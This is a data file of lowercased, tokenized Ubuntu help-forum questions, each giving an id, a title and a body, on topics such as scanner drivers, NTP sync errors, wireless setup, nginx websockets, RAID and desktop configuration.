49389	running a epson scanner perfection 3170	how can i make my scanner epson perfection 3170 running under ubuntu 11.04 ? when i run `` simple scan '' it said : '' no scanner detected '' . thanks edit : after i saw suli8 's anwser . i downloaded both rpm : iscan-plugin-gt-9400-1.0.0-1.c2.i386.rpm and iscan-2.10.0-1.c2.i386.rpm both where transformed+installed with alien . i tried it twice . $ sudo alien -i iscan_2.10.0-2_i386.deb warning : skipping conversion of scripts in package iscan : postinst postrm warning : use the -- scripts parameter to include the scripts . dpkg -- no-force-overwrite -i iscan_2.10.0-2_i386.deb ( reading database ... 160709 files and directories currently installed . ) preparing to replace iscan 2.10.0-2 ( using iscan_2.10.0-2_i386.deb ) ... unpacking replacement iscan ... setting up iscan ( 2.10.0-2 ) ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place $ sudo alien -i iscan-plugin-gt-9400_1.0.0-2_i386.deb warning : skipping conversion of scripts in package iscan-plugin-gt-9400 : postinst postrm warning : use the -- scripts parameter to include the scripts . dpkg -- no-force-overwrite -i iscan-plugin-gt-9400_1.0.0-2_i386.deb ( reading database ... 160709 files and directories currently installed . ) preparing to replace iscan-plugin-gt-9400 1.0.0-2 ( using iscan-plugin-gt-9400_1.0.0-2_i386.deb ) ... unpacking replacement iscan-plugin-gt-9400 ... setting up iscan-plugin-gt-9400 ( 1.0.0-2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place after rebooting . `` simple scan '' still says : `` no scanner detected '' . edit2 $ sudo dpkg -i iscan_2.10.0-2_i386.deb [ sudo ] password for lindenb : ( reading database ... 160709 files and directories currently installed . ) preparing to replace iscan 2.10.0-2 ( using iscan_2.10.0-2_i386.deb ) ... unpacking replacement iscan ... setting up iscan ( 2.10.0-2 ) ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place $ sudo dpkg -i iscan-plugin-gt-9400_1.0.0-2_i386.deb ( reading database ... 160709 files and directories currently installed . ) preparing to replace iscan-plugin-gt-9400 1.0.0-2 ( using iscan-plugin-gt-9400_1.0.0-2_i386.deb ) ... unpacking replacement iscan-plugin-gt-9400 ... setting up iscan-plugin-gt-9400 ( 1.0.0-2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place edit3 as a note i 'm copying here the original ronok 's response at http : //ubuntuforums.org/showthread.php ? t=1028064 & page=2 1 ) first see where things stand is the scanner usb properly connected to the computer ? lsusb bus 001 device 007 : id 04b8:0116 seiko epson corp . perfection 3170 ( gt-9400 ) 2 ) check that sane & xsane are present : sudo apt-get install sane & & sudo apt-get install libsane & & sudo apt-get install libsane-extras & & sudo apt-get install sane-utils & & sudo apt-get install xsane & & sudo apt-get install xsane-common & & sudo apt-get install libstdc++5 3 ) check that the system is upto date : system > administration > update manager ( or ) sudo apt-get update & & sudo apt-get upgrade 4 ) then lets see where things stand : xsane get a pop up window : no devices available 5 ) to get a list of devices scanimage -l no scanners were identified . if you were expecting something different , check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) . 6 ) see if sane can see the scanner ? sane-find-scanner found usb scanner ( vendor=0x04b8 , product=0x0116 ) at libusb:001:007 7 ) open and maybe edit this file check to see that `` epson '' & epson2 '' are uncommented ( that is with out '' # '' ) sudo gedit /etc/sane.d/dll.conf 8 ) ( with epson issues all roads seem to lead here ) so go to : http : //www.avasys.jp/lx-bin2/linux_e/scan/dl1.do fill in the form and download : -- - > iscan-2.10.0-1.c2.i386.rpm -- - > iscan-plugin-gt-9400-1.0.0-1.c2.i386.rpm to the desktop thats your : cd ~/desktop & & pwd 9 ) get alien alien allows you to convert `` .rpm '' files into debian `` .deb '' packages , which can be installed with dpkg . sudo apt-get install alien 10 ) make the `` .deb '' file from the `` .rpm '' file ( note in the code-example the `` * '' takes the place of e.g : `` -plugin-gt-9400-1.0.0-1.c2.i386 '' cd ~/desktop sudo alien -d iscan*.rpm sudo dpkg -i iscan*.deb 11 ) edit the libsane-extras.rules sudo gedit /etc/udev/rules.d/50-libsane-extras.rules 12 ) if it is empty add this line : subsystem== '' usb '' , env { devtype } == '' usb_device '' , sysfs { idvendor } == '' 04b8 '' , sysfs { idproduct } == '' 0116 '' , mode= '' 0666 '' , group= '' scanner '' 13 ) edit the epson.conf sudo gedit /etc/sane.d/epson.conf 14 ) add this line ( the usb device id from step # 1 above ) at the end : usb 0x04b8 0x0116 15 ) add yourself to the scanner group ( adding the scanner group if needed ) system > administration > users and groups > manage groups > unlock > add > check self 16 ) do a complete shutdown & restart the machine 17 ) try to get a list of devices again scanimage -l device `epson : libusb:001:006 ' is a epson flatbed scanner 18 ) iscan
49390	how do i install the latest version of node.js ?	how do i install node.js in ubuntu ? i 've been looking around , and i ca n't find anything . is there a ubuntu package for node.js , or do i have to compile it myself ?
49392	how to mark `` allow executing file as program '' on an external drive	if i try to set this option for a file on an external drive it just unmarks itself . doing chmod +x has no effect . the drive is mounted with default options .
49401	unable to sync time using `ntpdate` , error : `` no server suitable for synchronization found ''	my ntp.conf file : user @ pc [ 0 ] [ 07:37:40 ] : /etc $ cat /etc/ntp.conf idriftfile /var/lib/ntp/ntp.drift server 0.pool.ntp.org server 1.pool.ntp.org server 2.pool.ntp.org server pool.ntp.org command output : user @ pc [ 0 ] [ 07:37:24 ] : /etc $ sudo ntpdate -dv pool.ntp.org 18 jun 07:37:35 ntpdate [ 10737 ] : ntpdate 4.2.4p8 @ 1.1612-o tue apr 19 07:15:05 utc 2011 ( 1 ) looking for host pool.ntp.org and service ntp host found : conquest.kjsl.com transmit ( 198.137.202.16 ) transmit ( 216.45.57.38 ) transmit ( 64.6.144.6 ) transmit ( 198.137.202.16 ) transmit ( 216.45.57.38 ) transmit ( 64.6.144.6 ) transmit ( 198.137.202.16 ) transmit ( 216.45.57.38 ) transmit ( 64.6.144.6 ) transmit ( 198.137.202.16 ) transmit ( 216.45.57.38 ) transmit ( 64.6.144.6 ) transmit ( 198.137.202.16 ) transmit ( 216.45.57.38 ) transmit ( 64.6.144.6 ) 198.137.202.16 : server dropped : no data 216.45.57.38 : server dropped : no data 64.6.144.6 : server dropped : no data server 198.137.202.16 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 198.137.202.16 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d1a71a93.1f16c1e3 sat , jun 18 2011 7:37:39.121 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 216.45.57.38 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 216.45.57.38 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d1a71a93.524a05dd sat , jun 18 2011 7:37:39.321 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 64.6.144.6 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 64.6.144.6 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d1a71a93.524a05dd sat , jun 18 2011 7:37:39.321 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 64.6.144.6 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 64.6.144.6 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 thu , feb 7 2036 0:28:16.000 originate timestamp : 00000000.00000000 thu , feb 7 2036 0:28:16.000 transmit timestamp : d1a71a93.857c6fbd sat , jun 18 2011 7:37:39.521 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 18 jun 07:37:40 ntpdate [ 10737 ] : no server suitable for synchronization found
49403	how can i read and edit files from apple iwork ( keynote , pages ) ?	how can i save and read files from apple 's office suite , iwork ? it includes applications like keynote ( for presentations ) , pages ( word processing ) , etc .
49404	how do i uninstall windows programs from ubuntu ?	well , i 've got a computer with a windows partition , but whenever i try to boot to it once it 's loaded it freezes . i want to free some space from that partition ( for example , uninstalling windows programs ) , but i do n't know how to do this 'safely ' ; that is , without damaging the other parts of the system . do you know any way to do this ? if you could help me that would be of great help .
49412	support for hardware components	how can i find out if ubuntu supports a particular hardware component , that is , if it works in ubuntu ? i am going to put together a computer and i am choosing components . how do i know if ubuntu supports this or that motherboard , or this or that sound card , or this or that graphics card , etc ? how do i know that there is no conflict in ubuntu between this and that hardware component ? what resources are there to help with such situations ? i know that there are computers with ubuntu pre-installed and that there are ubuntu certification for whole computers but this is not what i 'm looking for . i 'm looking for resources to find out support for particular hardware components and conflicts among particular hardware components .
49416	prevent/stop wpa_supplicant from starting	wpa_supplicant seems to somehow be auto started at boot . # ps auxwww |grep wpa root 915 0.0 0.0 28824 1232 ? s 17:36 0:00 /sbin/wpa_supplicant -u -s how do i disable this service , prevent it from auto starting ?
49420	broadcasting webinars to and from ubuntu	i 've recently attended an online workshop using citrix gotowebinar , a service that allows someone to broadcast their desktop and audio out to all members connected to the presentation as well as receive audio and screencasts from those attendees , and the experience was unbelievable , and i was wondering if there was any such service/software available on ubuntu . points to consider include , but are not limited to : web services or local applications . free ( as in beer ) or paid . free ( as in speech ) or proprietary . ease of use ease of setup any other point that anyone can thing of
49426	indicator menu from gtk.builder ui string	i 've created an indicator that i think should work , but does n't . i 've added the ui interface from a glade file , loaded it and added the menu to appindicator . the following is the entire source code beginning with the xml . is there any reason why this should n't work ? # ! /usr/bin/env python # coding : utf-8 import gtk import sys import appindicator menu_definition = `` '' '' < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < requires lib= '' gtk+ '' version= '' 2.24 '' / > < ! -- interface-naming-policy project-wide -- > < object class= '' gtkmenu '' id= '' jes_test_menu '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkcheckmenuitem '' id= '' show_dialog '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' label '' translatable= '' yes '' > show dialog < /property > < property name= '' use_underline '' > true < /property > < signal name= '' toggled '' handler= '' on_show_dialog_toggled '' swapped= '' no '' / > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' new_events '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' label '' translatable= '' yes '' > new events < /property > < property name= '' use_underline '' > true < /property > < signal name= '' activate-item '' handler= '' on_new_events_activate_item '' swapped= '' no '' / > < signal name= '' activate '' handler= '' on_new_events_activate '' swapped= '' no '' / > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' exit_indicator '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' use_action_appearance '' > false < /property > < property name= '' label '' translatable= '' yes '' > exit indicator < /property > < property name= '' use_underline '' > true < /property > < signal name= '' activate-item '' handler= '' on_exit_indicator_activate_item '' swapped= '' no '' / > < signal name= '' activate '' handler= '' on_exit_indicator_activate '' swapped= '' no '' / > < /object > < /child > < /object > < /interface > '' '' '' class jestestmenu : def __init__ ( self ) : ui = gtk.builder ( ) ui.add_from_string ( menu_definition ) ui.connect_signals ( self ) menu = ui.get_object ( `` jes_test_menu '' ) ind = appindicator.indicator ( `` jes_test_menu '' , `` indicator-messages '' , appindicator.category_application_status ) ind.set_status ( appindicator.status_active ) ind.set_attention_icon ( `` new-messages-green '' ) ind.set_menu ( menu ) menu.show_all ( ) print ( `` indicator should now be visible '' ) def on_exit_indicator_activate_item ( self , widget , data=none ) : print ( `` exit activate item '' ) sys.exit ( ) def on_exit_indicator_activate ( self , widget , data=none ) : print ( `` exit activate '' ) sys.exit ( ) def on_new_events_activate_item ( self , widget , data=none ) : pass def on_new_events_activate ( self , widget , data=none ) : pass def on_show_dialog_toggled ( self , widget , data=none ) : pass if __name__ == `` __main__ '' : menu = jestestmenu ( ) gtk.main ( )
49429	how do i connect my server to a wep encrypted wireless network ?	i 've recently started working with ubuntu server 10.04 , but i 'm having a problem while connecting to wep-encrypted wifi . i 've tried the following : sudo ifconfig wlan0 down sudo dhclient -r wlan0 sudo ifconfig wlan0 up sudo iwconfig wlan0 essid `` < essid > '' sudo iwconfig wlan0 key < hex key > then , i tried to connect to the wifi by running sudo dhclient wlan0 , however , i keep getting the same error- no dhcpoffers received . am i doing this the right way , or is there something i 'm forgetting ? sudo ifconfig yields : wlan0 link encap : ethernet hwaaddr 00:1f:1f:3b:3c:3e up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 x bytes:0 ( 0.0b ) tx bytes:0 ( 0.0b ) while sudo iwconfig yields : wlan0 ieee 802.11bg essid : '' globalnetwork '' mode : managed access point : not-associated tx-power:8 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : my-hex-key power management : off i 'm trying to connect with a ralink rt2561 that shows up with lshw -c network . any help you can give me is much appreciated , what am i doing wrong ?
49430	on-line security tools ?	are there tools built into `` ubuntu '' ( or possibly within the repositories ) to help me secure my on-line information .
49431	how do i configure nginx to serve ws : // urls ?	i 've currently got nginx running a cluster on thins which serves up my rails app . my iphone app sockets framework wants to connect to a url starting with ws : // i 'm pretty new at this but ... where should i start looking into this ? is this something i configure in nginx or completely separate ? i 'm using faye .
49434	how do i install termkit ?	i spend most of my time in the terminal . i heard something about termkit , and i 'm curious as to how i can install it on ubuntu . so far , i have n't been able to find any good instructions on how to install it .
49435	gconf-editor missing gnome-system-tools from tree	i am trying to to enable the /apps/gnome-system-tools/users/show_all flag that is supposed to be in gconf-editor . according to the ubuntu community documentation , and many google searches , the key i want should be in the above location but the entire /apps/gnome-system-tools tree is missing . https : //help.ubuntu.com/community/fixshowallusers my problem is not getting the key to work , i will deal with that later , i do not have /apps/gnome-system-tools in the tree view . some users claim that it shows if you run gconf-editor as root , but mine is exactly the same running as root . based upon what i have read here : http : //projects.gnome.org/gconf// i think that the hive/config-source was never added when the gnome-system-tools package was built into the release . either that or they have moved the branch and i have yet to find the documentation noting the move . it looks like i could start adding folders in { $ home } /.gconf/apps/ and they would then show in the tree , but i would prefer to have everything from the gnome-system-tools branch loaded in properly . also from what i can tell there is no good way to start adding folders to the tree view directly via the gconf-editor tool , right click does nothing and there are no preferences under edit . how do i get the /apps/gnome-system-tools branch to appear in gconf ? or , if necessary , where do i find its default configuration source so that i may add it ? i am using ubuntu 11.04 natty narwhal i386 version , with gnome version 2.32.1 , and the 2.32.0-0ubuntu7 gnome-system-tools package is installed .
49436	which should i use on hp machine with amd phenom x3 : 32-bit or 64-bit ?	i installed ubuntu natty 64-bit on hp machine , with the following hardware : amd phenom 8600 triple core processor 3gb ram geforce 6150se nforce 430 but i feel that it 's so slow compared with the same machine with ubuntu lucid 32-bit with pae . what do you recommend , install natty 32-bit ? get back to lucid or maverick ? some tip for speed up my machine ? should i install gnome ?
49437	how can i make the background dark while watching video ?	while watching videos on my desktop ( not in browser ) i want to make the background dark . for eg : in the above pic i want everything to be black except the video . i do n't want to make it full screen due to the reduction in the quality of the video .
49440	unable to launch nautilus with sudo	when i run nautilus with sudo , gksudo or alt+f2 , i get this error message : initializing nautilus-gdu extension ** ( nautilus:2352 ) : warning ** : failed to get the current ck session : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '2352' ( nautilus:2352 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** ( nautilus:2352 ) : critical ** : nautilus_directory_file_monitor_add : assertion `nautilus_is_directory ( directory ) ' failed ( nautilus:2352 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( nautilus:2352 ) : glib-gobject-critical ** : g_signal_connect_object : assertion `g_type_check_instance ( instance ) ' failed ( nautilus:2352 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( nautilus:2352 ) : glib-gobject-critical ** : g_signal_connect_object : assertion `g_type_check_instance ( instance ) ' failed ** ( nautilus:2352 ) : critical ** : nautilus_directory_get_uri : assertion `nautilus_is_directory ( directory ) ' failed any idea why ?
49446	after removing gnome3 , gnome could n't load !	after uninstalling gnome3 , i reboot computer and appeared proxy user below mine and did n't know its pass . after i logged in with my name , terminal just opened . then i tried installing ubuntu desktop but it could n't fetch repos so i could n't . i updated the sources.list and removed old 10.10 ones but it did n't work also , cause i could n't connect the internet due to proxy i guess . i tried many solutions similar to mine . but i could n't solve it . i hope they did n't effect the system badly . i just want to know , is there any way to fix up the system without reinstalling ubuntu or without loss of user data ?
49447	can shotwell create a folder structure based on the date the photos were taken ?	all my photos are quite disorganized and i found this option in the settings dialogue to import pictures and create new folders using this pattern : /home/username/pictures/ < year > / < month > / < day > shotwell also asked whether to link or copy the pictures and i chose to copy , but nonetheless they are n't copied . what can i do ?
49451	gnome terminal column/row width ?	i wish to have an image in my terminal background but i am unsure how big the image needs to be . the terminal is sized at 80x24 which means 80 columns wide and 24 rows high , however i am unable to find anywhere documenting how wide a column itself is . does anyone happen to know the pixel width of a column/row in the gnome terminal ?
49460	unity top menu at top of screen	is there an option with ubuntu unity to put the top menu bar back to the active window of the application ? when you are using a desktop with 1920x1200 and a window at the bottom of the page , it 's a long distance to the top of the screen .
49463	integrating gnome-terminal with notify-osd	i 'm wondering if it 's possible to integrate notifyosd with gnome-terminal . i 'd like if notifyosd warned me if there was new output in gnome-terminal ( if the window is n't focused ) . as soon as a new output is printed and the window is n't focused , it 'd warn me through notify-osd ( 1 time only ) . for instance : is this possible ? thanks .
49465	installing ubuntu broke my windows install	so i went out and brought an hp dv6 laptop . the laptop came pre-installed with windows 7 home premium . the laptop had several partitions . a system partition which appears to be a boot loader only . a windows partition with , as you can guess the windows install . a recovery partition , which is used to run recovery if windows fails . a hptools partition , which im not sure what that is . so , when i got the laptop i shrunk the windows partition as much as i could , and then created an empty partition using the unused space ( using the windows partition manager ) . i then installed ubuntu 11.04 using the live cd into the new partition . ubuntu works fine , and in the boot loader i have ubuntu , ubuntu ( recovery ) , memory test , memory test ( again ) , windows 7 ( loader ) , windows 7 ( loader ) . if i choose the first windows 7 ( loader ) windows starts to load , the boot animation gets to a certian point , then it gets the bsod . if i choose the second windows 7 ( loader ) i get told that windows failed to load as it does not have permission to access the drive . i then get the option to run windows repair . but when i choose this option i simply get the grub loader . how can i fix this ? gparted shows
49468	external hdd shows up in /dev/ , but inaccessible via [ g ] parted	i have an external 80g hard drive , connected with usb . i 've used this for multiple things in the past , including running an ubuntu os off it ( i know , bad idea ) . in any case , it came unplugged while i was running ubuntu . of course , ubuntu promptly generated errors and i shut down the computer . i plugged it in again and started it up , but my bios did n't recognize the hard drive in the devices list . while running off the livecd ( or another ubuntu os , now on the internal hard drive ) , a ls /dev/ | grep sd shows the device ( sdc ) when it 's plugged in and omits it when it 's not ( so i know that 's the correct drive ) , but gparted does n't show it in the device list . if i run parted /dev/sdc , parted does n't start up and there is no error message ; if i type select /dev/sdc while already in a parted interactive prompt , i again get no message , and it 's still on /dev/sda . the same goes for the gparted livecd . cat /proc/partitions outputs major minor # blocks name 8 0 244198584 sda 8 1 102400 sda1 8 2 119950336 sda2 8 3 119950336 sda3 8 4 4194304 sda4 8 16 3913728 sdb 8 17 3913664 sdb1 does anyone have any suggestions as to what i should do ? edit : want to make it clear that i am willing to format the drive if it means i can use it at all again . edit 2 : here 's the output from dmesg | tail -25 as suggested by marto : usb 2-4 : new high speed usb device using ehci_hcd and address 8 usb-storage 2-4:1.0 : quirks match for vid 05e3 pid 0702 : 520 scsi8 : usb-storage 2-4:1.0 scsi 8:0:0:0 : direct-access 811 ata/ atapi device 0014 pq : 0 ansi : 0 attached scsi generic sg3 type 0 sd 8:0:0:0 : [ sdc ] test wp failed , assume write enabled sd 8:0:0:0 : [ sdc ] asking for cache data failed sd 8:0:0:0 : [ sdc ] assuming drive cache : write through sd 8:0:0:0 : [ sdc ] test wp failed , assume write enabled sd 8:0:0:0 : [ sdc ] asking for cache data failed sd 8:0:0:0 : [ sdc ] assuming drive cache : write through sd 8:0:0:0 : [ sdc ] attached scsi disk upon disconnecting : usb 2-4 : usb disconnect , address 8
49469	command-t vim `` could not load c extension ''	when i hit \t to use the command-t extension in vim , i get the error command-t.vim could not load the c extension i 'm not sure how to go about fixing this ... any suggestions ? thanks i am using the git-repository installation method . here 's what happens when i `` rake make '' : ~/.vim/bundle/command-t $ rake make ( in /home/petef/.vim/bundle/command-t ) /usr/bin/ruby1.8 extconf.rb extconf.rb:24 : in `require ' : no such file to load -- mkmf ( loaderror ) from extconf.rb:24 rake aborted ! command failed with status ( 1 ) : [ /usr/bin/ruby1.8 extconf.rb ... ] /home/petef/.vim/bundle/command-t/rakefile:136 ( see full trace by running task with -- trace )
49470	program run with gnome alt-f2 dialog does n't have focus	i 'm using gnome 3 shell on ubuntu natty ( 11.04 ) . when i start a new program with alt-f2 , i 'd like focus to be on that window . instead , focus is given not to the previous window which had focus nor to the program i just ran , but to a different window . anyone have ideas on how to help the window manager give focus to the just-run program ?
49471	$ _server [ 'php_auth_digest ' ] empty with mod_auth_digest enabled	the output from sudo apachectl -t -d dump_modules loaded modules : core_module ( static ) log_config_module ( static ) logio_module ( static ) mpm_prefork_module ( static ) http_module ( static ) so_module ( static ) alias_module ( shared ) auth_basic_module ( shared ) auth_digest_module ( shared ) authn_file_module ( shared ) authz_default_module ( shared ) authz_groupfile_module ( shared ) authz_host_module ( shared ) authz_user_module ( shared ) autoindex_module ( shared ) cgi_module ( shared ) deflate_module ( shared ) dir_module ( shared ) env_module ( shared ) headers_module ( shared ) mime_module ( shared ) negotiation_module ( shared ) php5_module ( shared ) reqtimeout_module ( shared ) rewrite_module ( shared ) setenvif_module ( shared ) ssl_module ( shared ) status_module ( shared ) syntax ok seems to indicate that the digest auth module is working on my server , but when i try to access $ _server [ 'php_auth_digest ' ] , the variable does n't exist . my virtualhost setup is : < virtualhost *:80 > servername sam documentroot /var/www/sam/public/ errorlog /var/log/apache2/sam-error.log setenv application_env `` development '' < directory /var/www/sam/public > directoryindex index.php allowoverride all order allow , deny allow from all # authtype digest # authname `` api '' < /directory > < /virtualhost >
49472	what does `ls -- author` mean ?	what exactly means ls -- author it really returns writer of a file or owner ? how to set author for a file ? i have to implement this part ( ls -- author ) , so need to know what exactly it is .
49473	nautilus - can i set nautilus not to display the drive size , just the name ?	is there any way to disable or at least change the way nautilus displays drives ? my drives show up as such size of disk : diskname ex : 1.0 tb hard disk : datastore i have the drive labeled datastore , but when i open nautilus under computer it shows 1.0 tb hard disk : datastore , it would be great if it simply said datastore to make it easier to jump around with the keyboard . any ideas ?
49474	can i monitor home network and throttle traffic ?	i have several computers in my network and would like to see which computer is hogging too much speed , then possibly throttle that pc . all computers are going through one router , both wired and wireless . i have tried wireshark , but is very complicated and i ca n't seem to get anything other than usb monitoring , and cacti installed , but does n't even show up on the menu ( at least i ca n't find it ) . any help appreciated , and thanks in advance .
49477	acer aspire 5532 overheating	had the laptop for about a year , when in windows it never happens , but seems to happen frequently in xubuntu 11.04 . i 've looked almost everywhere for increasing the fan speeds , because it never kicks into high gear , just a steady pace for idle use . lm-sensors does n't show fan speeds , just the temps of the cpu . as far as http : //ubuntuforums.org/showthread.php ? t=1740140 thread goes , i 've already got the latest kernel . fan is clear of dust , and it runs at an average temperature until the gpu is needed $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +85.0째c ( crit = +200.0째c ) k8temp-pci-00c3 adapter : pci adapter core0 temp : +76.0째c core1 temp : -49.0째c shortly after this it shuts off from overheating . when i can get it to cool off i 'll give what i can for an idle temp . i ca n't tell if it 's a fan speed issue , or a special fan for the gpu that is n't supported .
49478	can not use only external lcd monitor with laptop	i just bought a new laptop . i like to connect it to an external monitor , and configure the displays such that the laptop screen is off , and the external monitor is set to max resolution . when i do make this change in the displays/monitors configuration , both displays go dark . after the `` keep settings ? '' timeout expires , only the mouse cursor is visible . the laptop is a http : //zareason.com/shop/strata-pro-13.html . it has intel gma 4500mhd integrated video . i 'm using ubuntu 11.04 ( natty ) . this problem repros in unity and gnome shell . repros with both vga and hdmi outputs . does not repro in ubuntu 10.04.2 , so it makes me suspect some kernel problem in ubuntu 11.04 . update ( mon jun 20 02:19:33 utc 2011 ) : kernel is 2.6.38-8-generic-pae ( 32-bit ) . problem also repros on non-pae 32-bit kernel . lsmod shows the `` i915 '' driver is loaded and `` video '' is using it , so i 'm guessing the video driver in use is `` i915 '' . i filed a bug in launchpad , too : https : //bugs.launchpad.net/unity/+bug/799609
49482	what takes so long when toggling off the desktop ?	what takes so long when toggling off the desktop ? ( gconf-editor , then apps > nautilus > preference > show desktop toggle ) it 's not that i ca n't do anything else in the meantime , but the pointer is in 'spin ' mode . toggling back on does not do this .
49483	random files ( invalid encoding ) appearing in home directory	there are various files with random names this is a recent issue , but i 'm not sure how it 's happened . the only new install on my system was remmina and i 've been playing around a lot with screenlets and other display settings ( ccsm ) . they are all of 0 bytes , and reappear with different names after i delete them . ls shows them as ? ? in listings . however nautilus shows the following : i 'm using ubuntu 11.04 with the classic desktop . update : kernel log : http : //paste.ubuntu.com/629269/ . my hard is failing as per smart tests .
49488	tomboy notes logged by zeitgeist do not appear in the unity dash . why not ?	i am able to search my tomboy notes using synapse ( and using a zeitgeist plugin ) , after following the instructions here : how do i get synapse to search my tomboy notes ? my notes also appear in the activity journal . since both synapse and the dash rely on zeitgeist data , why do n't tomboy notes also appear in the unity dash search results ? is there anything that can be done ? ( a similar question has been asked : can i search tomboy notes with dash ? )
49490	hp pavilion dv6 ca n't shutdown or reboot	ubuntu 11.04 with hp pavilion ca n't shutdown or reboot . i am old linux user , been using linux for years , this is the first time in encounter this issue ever with many linux distros on the same machine . i tried many distro but mainly ubuntu ( 10.04 , 10.10 , 10.04 ) , the system ca n't reboot or shutdown with . other than that everything works fine . same issue happened with linux mint ... . well i have seen many questions with the same problem and no real answers yet , or accurate replies from ubuntu or even hp . my machine is : hp pavilion dv6 , core i7 processor , 4 gb rams , ati radeon ... . etc .
49492	how do i configure my 2 raid drives so i can use it as /home ?	i 've installed ubuntu 11 64-bit to a 2 tb drive . it is on /dev/sda - port 1 of sata host adaptor . this contains /dev/sda1 ( 1 mb boot ) , /dev/sda2 ( 2tb ext4 ) , /dev/sda3 8.6gb swap . i also have : /dev/sdb 2tb raid component /dev/sdc 2tb raid component which also show as /dev/dm-0 not partitioned /dev/dm-2 not partitioned which is mounted as /media/raid_home i 'm completely stumped as to how to use this version of ubuntu to make these drives seem as just one raid mirrored drive and then how to transfer /home onto it .
49497	ntfs recovery software for ubuntu ?	i need a free linux application to recover some files on an ntfs . please suggest me a best one ?
49498	file uploaded but never completed	i put a file in the ubuntu one folder and it gets uploaded 100 % and then nothing happens . i do not get a message it has completed and looking at the website it has not been uploaded . this generally happens with bigger files ( 50+ mb ) . i have a 100/10 mbit/s fiber and have no problems with dropbox . here is a paste of syncdaemon.log http : //pastebin.com/csucru3n
49504	forced into `` classic '' interface under vmware fusion	i installed ubuntu 11.04 under vmware fusion on my macbook pro . the first time i logged in , there was a message , something like `` unable to run unity because your hardware is not supported , ubuntu will now switch to the classic interface '' ( not exact message ) and then ( and every time i log in ) ubuntu starts with a version 10 like interface and after sometime ( ~20 sec ) switches to a real `` classic interface '' this is when i log in : immediately after i log in : and in `` sometime '' ( ~20 to 30 sec ) : ( i did have the time to open the home folder , but i had to do it quickly ) is this normal ? when ubuntu says `` classic '' interface , is this what it means ? i understand there may be special h/w requirements for unity , but the version 10 desktop should be the fallback right ? should i do some additional configurations somewhere ? ( i have ubuntu 10 on vmware and it does work with the default desktop interface , albeit with the `` no effects '' option )
49505	how to find out status of a job ( scheduled with at )	how can i find out the status of a job scheduled with at ?
49507	do commands continue running after i close my ssh session ?	for example , i ssh into a server and run a command say ... wget , then i close the terminial window . do my download continue ? or does it depend on the app ? if so how do i know ?
49508	how to show mouse pointer location using a mouse click ?	i want to record my screen , and clearly show what is being clicked . you can configure the mouse to show the location when ctrl key is clicked . i want exactly that kind of behaviour , but only when the left mouse button is clicked instead of ctrl key . is there a way to configure this ?
49509	how i get all the software in ubuntu software download ?	how i get all the software in ubuntu software download ? there is a txt list or a website with categorize that i can navigate easily and see all the applications that is in ubuntu download software ? thanks for all .
49517	how to disable session/admin password for printing ?	each time i print , the session password is required . how to disable it ?
49521	drag and drop in unity ( with alt + tab )	i would like to be able to drag files from one window ( nautilus ) to another switching app with alt + tab . is that possible ?
